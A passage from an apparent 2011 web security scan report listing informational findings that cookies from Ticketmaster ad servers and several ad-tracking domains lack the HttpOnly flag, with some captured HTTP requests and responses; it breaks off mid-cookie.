User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NDMA=238; NPDMA=238; GEO_OMN=in

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:46 GMT
Server: Apache
Set-Cookie: NGUserID=a4b2480-32187-970230788-20; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: svr2.ads.ash3.clisys.tmcs:9691:1
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM", policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Content-Length: 114
Connection: close
Content-Type: application/x-javascript

document.write('<img src=\"http://creatives.as4x.tmcs.net/blue_dot.gif\" width=\"1\" height=\"1\" border=\"0\">');

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.as4x.tmcs.ticketmaster.com
Path:	/js.ng/site=tm&pagepos=3004&adsize=422x30&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a4b2480-32187-1010193989-19; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=tm&pagepos=3004&adsize=422x30&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43 HTTP/1.1
Host: ads.as4x.tmcs.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NDMA=238; NPDMA=238; GEO_OMN=in

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:46 GMT
Server: Apache
Set-Cookie: NGUserID=a4b2480-32187-1010193989-19; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: svr2.ads.ash3.clisys.tmcs:9691:1
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM", policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Content-Length: 114
Connection: close
Content-Type: application/x-javascript

document.write('<img src=\"http://creatives.as4x.tmcs.net/blue_dot.gif\" width=\"1\" height=\"1\" border=\"0\">');

14.26. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_SZJZ="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4umiKbjeSRFG1WGV7v3P2wuhddhrqwvMRjk0BenkJXocfzEwn+Nqhfv9uk/5yFLDCoDEiXP/hOV/sixRxjRF5rWB9KnHODU3B/yiV31fU9eC47+7M/+n0rHdBD4ZxTqL+i57Kfedz/cOyQJ/yqrT8WH56MJW2k/Y9CySxYR40lREQTsrWG7iHX/ZXcgbRha1qYshbnj41ek4M+T6JcKCxkbH15JB/en3mXv1AsBpaE/NatqWqHNyHQHJfAhdEnyH1+AAopspuM3siXVWxrdxhMapoJxsBhSSal7CXpZYG+uwKX6/HBBoo1QiOnTYinh15lebN38dWtzvNR2O+WFyXzCozolPtxDwm0dHcYAcuFfIr8QFcmjsXeoy54UcbFQfkl9uHXtLBbnuMbnFxbNwaHE//LzUfc5hb2GScAS+tt37fQYS17jN3hBQaRrUBkzt7rfFLMsvMHbbyYv3KfLRCE3w09MCuPqRLiZY3ytjjsY6apkPVVkOf7RGTxh3YfEL6eFDcKTCpWqfnef4KW5APHU9wMNAvLlgroCAf/NhO2U3Y/GfwP4tEvTYLJN23RLPRD8S8OCoPmsUEcTjYSdXrAa+japzdcP3mqBhAwNNo4MEXKPVwsppVJe0EX3fGU/z4laDN06Bl4R1L1Ud+xKxsSeEJJVA4fdmtNkncbfRp/AuusRsiMiJmM8wEh9cHMeuWvC/1JGAquOj+tGnyCfumeubLuDosKPCGVUatVhMm8Un4rKjml83L7IXGsViPmi+mSBR6ghqHQjD4aMO749hTnc8Y8YtOlKc7ILWPtzWq1qxsPOFXM/G/zC/lKJdZpuX37zzVp/oTsbOePRvoa6pns4A4/pYni1f1cOWO4QmossHVIGr7gqKt2dJIcAbrZspS2DHtJse2yV6D948mxs5iyfph8iLvlPiGAk70vnVSIWhOxIRAf1Hubw1TQuNP9oTufqhhBrP9GvCENRUI1T3eVdbDJcIJdZFtu6QHj8+l4WNRDiGqpozNwcSCkTIbu9FwpFhC0Hh4P0m7hqR4Kv6Lei7atV+4x3ApSzcU30KQIJYd24qeaXX0AM2NZKIsIh/PCCWU30b2w1A+4XoXLNY9hpJjWMQAk2uIG/HXtcco1ZuZjVGniEqwPjgK3X0T7ZWByLmJvp8X3Klk8GibfUeyNvNx6XGzxASGUkyGEWOfMUp9fjZ6IpP+EVsoSlBDHB+J8FDy1Tna3CDV1xsTytG+31h1s3uvGX6QIQ3GbvJENudrwhqTQb3dewEm3Rg/SAyb0xljjjF/rEoV/y1xhGU6vwWSmXhsTq0YU2p5nRFroYcOuwzmqM5qplSuVq/oPqIEHSWbSxqLpJLHzwjNOZLwAqynbTkWi6aUeO3RHvwfmwQ70KqDFHoSqXTseyacFksSkrt04Fkkh7y+uzYAwdvOl7Jd3QinEFa0FNW49rkGHj3tqQ7u6bJXw+d0dwc5+xla32jQflwdmRpSh1ssB1xZMcK7cy3AYW/iT+NpHbx"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.27. http://ads.undertone.com/fc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/fc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

UTID=f3b4b703c00b47eb93300bd230973543; expires=Wed, 18-Jul-2012 20:43:04 GMT; path=/
UTPROFILES=15174%23288%3A6%2C2%7C1022%3A6%2C2_1%2C2%7C1023%3A6%2C2_1%2C2%7C1671%3A7; expires=Mon, 17-Oct-2011 20:43:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fc.php?dp=8&pid=D,T HTTP/1.1
Host: ads.undertone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UTID=f3b4b703c00b47eb93300bd230973543; UTPROFILES=15174%23288%3A6%2C2%7C1022%3A6%2C2%7C1023%3A6%2C2%7C1671%3A7; A28X=3sctnLo1Ii2YRYsbSAhSEkGPDnyiF-Kjl82XJIrWXTxZ7EhcgAcQ0cA; UTLIA=223791.lockef-13588; _UTLIA[174266]=lolljj-16565; _UTCBLOCK[28159]=1311108175; _UTSCCAP[28159]=1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:43:04 GMT
Connection: close
Set-Cookie: UTID=f3b4b703c00b47eb93300bd230973543; expires=Wed, 18-Jul-2012 20:43:04 GMT; path=/
Set-Cookie: UTPROFILES=15174%23288%3A6%2C2%7C1022%3A6%2C2_1%2C2%7C1023%3A6%2C2_1%2C2%7C1671%3A7; expires=Mon, 17-Oct-2011 20:43:04 GMT; path=/

GIF89a.............!.......,...........D..;

14.28. http://ads.undertone.com/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_UTLIA[174266]=lolljj-16565; expires=Thu, 18-Aug-2011 20:42:55 GMT; path=/
_UTCBLOCK[28159]=1311108175; expires=Thu, 18-Aug-2011 20:42:55 GMT; path=/
UTID=f3b4b703c00b47eb93300bd230973543; expires=Wed, 18-Jul-2012 20:42:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /l?bannerid=174266&campaignid=28159&zoneid=16565&UTLIA=1&UTCBLOCK=86400&UTSCCAP=5&ptm=1671&cb=6ae6c1caed774ca287c93a7d3ec3c5db&bk=lolljh&id=2vaimk2c7zwrks2trxj9vaxbr HTTP/1.1
Host: ads.undertone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UTID=f3b4b703c00b47eb93300bd230973543; UTPROFILES=15174%23288%3A6%2C2%7C1022%3A6%2C2%7C1023%3A6%2C2%7C1671%3A7; A28X=3sctnLo1Ii2YRYsbSAhSEkGPDnyiF-Kjl82XJIrWXTxZ7EhcgAcQ0cA; UTLIA=223791.lockef-13588

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:42:55 GMT
Connection: close
Set-Cookie: _UTLIA[174266]=lolljj-16565; expires=Thu, 18-Aug-2011 20:42:55 GMT; path=/
Set-Cookie: _UTCBLOCK[28159]=1311108175; expires=Thu, 18-Aug-2011 20:42:55 GMT; path=/
Set-Cookie: _UTSCCAP[28159]=2; path=/
Set-Cookie: UTID=f3b4b703c00b47eb93300bd230973543; expires=Wed, 18-Jul-2012 20:42:55 GMT; path=/

GIF89a.............!.......,...........D..;

14.29. http://api.choicestream.com/instr/api/8e360375d27a5381/a1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.choicestream.com
Path:	/instr/api/8e360375d27a5381/a1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.30. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 14:26:45 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.31. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 20:49:01 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.32. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 20:43:27 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.33. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/minorcat/1/11408426983@x02

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFM=011QjF9J810JLQ|U10MCo|U10QMP|010TqE; expires=Fri, 19-Jul-13 18:36:05 GMT; path=/; domain=.mookie1.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.34. http://bcp.crwdcntrl.net/4/c=520|rand=478684930|pv=y|rt=ifr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/4/c=520\|rand=478684930\|pv=y\|rt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

aud=ABR4nCXPPwsBcRjA8UeKS%2B6cv6dsdC%2BA8g5kMJyVjbeAxXaTBbtsbvQCDBKy2CwmszIppUxSrud7y6fn%2BT3%2FTkTEc59DkUi1UQm%2BUhexy774YX6uJK9KZkJ0U1JjJd8n%2BhH1lKyhWF0lvVQKd8WoKYmFkrvQ3qTkTUOcYSeSA9a%2BSG4o%2BShmlOQWdnDgXI%2F2KZUl3lYQMNPiFi4rOKIfi2Im%2F5BXnL1inxn94IgO0RBGVLpU8mbW2TfjbU3fUSm22N4O%2BQPE21a7; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:43:31 GMT; Path=/
cc=ACN4nGNQSDE0TLUwNUlNMzJMsTRJNDE1TDUzTzZLszQ3sEwyMTRlAAI%2F1TfF%2F3U2JzEwMBq6KC%2F6DRJjYPffVcTIwMTBwPCfESgBRP67SlAFEiqq0AVq0AWy0AWmoAu0oQoweAh%2Bn83CwHC2geE%2FSEByb%2FF%2FoHMYLYB8RiD%2FC0Q8rSqAsCLvL3EgRRBJBkmIILoiwe9TCZsk8%2F8IYZOi334nrEhrjyphRTL%2FTxNWFHamgLDDBb%2B3EVaktUeBsHWBKjGEFcmaXeSAKgIKKgFpoCRjAVSRJESccRKEj64ZkgwYmYAaGRgl5fTLCdsXwLsPt30we%2BD2YrcPpNH7SwkxUSdDRDAtYqaKixT2NxPjIlHCirjqG6gVJ27W5wjbp7C%2FnbAi%2F%2Fy9hBV5f0knrEjOcAthRcJqlsRYl0%2BMSabEKDImrCiBIZCwoqBqJuT8iysw1xHO5AkMAYStk1ppREQEb%2BAnrMjNehExJeYaYpLKbWKsW01YUTzLbsKKEi3PEQ5M%2BRl8hBX5558kpliVIsbhewgrSr0vS9hNXi%2BuE05PXK2TqFViBKooE3a514s7hB0l838%2FMaGpTYx1twlb5%2FXiFmFFygIORGSX9f%2BJSeTPiPGdAWFFaWpEtIzcrOcTNomv4i21koF%2F%2FgvC9iWdPEVMkZFKWJFiKhGpLj42mrAi7dMqRJQGmRbEWBdBjKJ4woqS%2FYgoDQA8OiC4; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:43:31 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.35. http://bcp.crwdcntrl.net/4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

aud=ABR4nGNgYGDwU32xl4GB0dBFVGUdgzUDg4ASAxj0gkmeyxDqJpjir2xgaGBgYF4D4VWBeaKJYJ5oAkTwL5jiMAJTYo%2FBFNcMsErxAjBP5BxEpRuY4guDqPwEpni%2FQXiVEDMPgfXx%2FoE44j2YJ1YE5rFKgSnBrxCVOyHamSG8XRCX7YFo6IQI7ofwuiEqpSGCCyFG84EpgUKIcyGuFhMHaxC6BgkQiO1svGCOxH0IFQimJJ0glCPER6JgSnwfxMzjYEroGYQqhhi9BcIrgahUhXjTFMJbBfHYAbCghBfESf5AAgAIDzOP; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:41 GMT; Path=/
cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rd7%2F288kcbAwGjoIqqyDiTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIFZIqLDEJScj%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAJO5PNwsBwdm8TWFayAagKKG0BpBmBCr5A%2BILfZzMzMCht2QcWPAukQSZI%2Fv8P1ARkKAWqODHDDWG0RNWstccUt2RaVQDIeggHaiKG9WFnKnCbIPP%2FCD7J04R957%2BrgLCisDMFMIcy4HRooEo0vnBQwC0p%2BL2NGW48umSgSgxhB8qaXeQAKWoGh6QSkAZKwk0CRz%2BaJiDNxHFxGpgPThaMwHSiBGTL6ZfjdmkA7z5q2eP9pQRfcMnglgxcxEwtR2jtkcBtj8L%2BZnwuFCUcLVz1DdRyqZv1OeRcCLMXnBtBZivsb8ftWP%2F8vXg1u1mfxa3Z%2B0s6Psk03JJyhltwSwqrWeJ1k7AanpLD%2B0s%2BXs05J2cCA9IUmFGBXMXk74SjKqiaCVceZACG3zrC%2BT9MOANfWnqDR3IDP2EHulkvxG2Cm%2FUi3JKhPTPx6VyNWzJMuBJfojpKjKu34zPhMG7JeJbd%2BBxWgFsy0fIc4WpFfgYfMUW6FN5kFs%2Byh4jKQ7WSsKLU%2B7KE3axwCU94eb24jmwCNmsYGLhaJ1GrQApUUcJTRKso45ZUXFZHOEBk%2Fu8nrChQRRtv%2FHi9uIE7U3u9uIVbUlnAAV%2B6fYYnM6%2F%2FT4zDDfA0i9SIaBYp7L%2BG2wS%2BirfUimb%2F%2FBd4YnLWTcJ%2BBQAr6yeC; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:41 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.36. http://bcp.crwdcntrl.net/4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

aud=ABR4nGNgYGDwU33RxcDAaOgiEredwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPrEiiCOeA%2Fm8f4B81ilwJTgV4jKnRDtzBDeLojL9kC0d0IE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQjxmCvHRAUhgrYK4xR9ikReQAAAfMjOe; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:50 GMT; Path=/
cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rdd%2FzeemMnAwGjoIhK3HSTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIOZLqLDEJccj%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacv%2B%2F4xAgbNAGiQJUQ1kKIWdyWYBiu9tBuuWbGAAyTNaAGmQ%2Bi8QfqCKEzNcEaMlqqTWHlPckmlVASDjIRyYI9GNDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRS3gkFQC0kBJuElgh6NpAtJMHBeng%2FngZMEITCdKQLacfjlulwbw7qOWPd5fSvAlGxnckoGLmKnlCK09ErjtUdjfjM%2BFooSjhau%2BgVoudbM%2Bh5xVYfaCsyzIbP%2F8vXjlFfa34%2FaMm%2FVZ3JLeX9LxSabhlpQz3IJbUljNEq%2BDc07OBIaFKTgMgNbk41UsrIanmAmqZsKVvRgYFJO%2FE45H%2F%2Fx1hMsBhf1v8JQkwhl4EtoGfsJucLNeiC8CF%2BGWDO2ZiU%2FnanyursQt6Z9%2FlBhXb8dnwmHckvEsu%2FE5rAC3ZKLlOcLVivwMPsJRGqgihTfZxbPsIRwEYaqVhBWl3pcl7GaFS3jCy%2BvFdWQTsFnDwMDVOolaBVKgihKeIlpFGbek4rI6wgEi838%2FMZW3Nt748XpxA3fO93pxC7eksoADvnT7DE9mXv%2BfGIcb4GkWqRHRLFLYfw23CXwVb6kVzf75L%2FDE5KybhP0KAAzXFWI%3D; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:50 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.37. http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

aud=ABR4nGNgYGDwU30Ry8DAaOgivLqBwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPrEiiCOeA%2Fm8f4B81ilwJTgV4jKnRDtzBDeLojL9kC0d0IE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQjxmCvHRAUhgrYK4xR9ikReQAAD3BjOG; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:05 GMT; Path=/
cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rex%2FzeeOMbAwGjoIry6ASTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIGZJqLDEJcck%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacv%2B%2F4xAgbNAGiQJUQ1kKIWdyWYBiu9tBuuWbGAAyTNaAGmQ%2Bi8QfqCKEzNcEaMlqqTWHlPckmlVASDjIRyYI9GNDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRS3gkFQC0kBJuElgh6NpAtJMHBeng%2FngZMEITCdKQLacfjlulwbw7qOWPd5fSvAlGxnckoGLmKnlCK09ErjtUdjfjM%2BFooSjhau%2BgVoudbM%2Bh5xVYfaCsyzIbP%2F8vXjlFfa34%2FaMm%2FVZ3JLeX9LxSabhlpQz3IJbUljNEq%2BDc07OBIaFKTgMgNbk41UsrIanmAmqZsKVvRgYFJO%2FE45H%2F%2Fx1hMsBhf1v8JQkwhl4EtoGfsJucLNeiC8CF%2BGWDO2ZiU%2FnanyursQt6Z9%2FlBhXb8dnwmHckvEsu%2FE5rAC3ZKLlOcLVivwMPsJRGqgihTfZxbPsIRwEYaqVhBWl3pcl7GaFS3jCy%2BvFdWQTsFnDwMDVOolaBVKgihKeIlpFGbek4rI6wgEi838%2FMZW3Nt748XpxA3fO93pxC7eksoADvn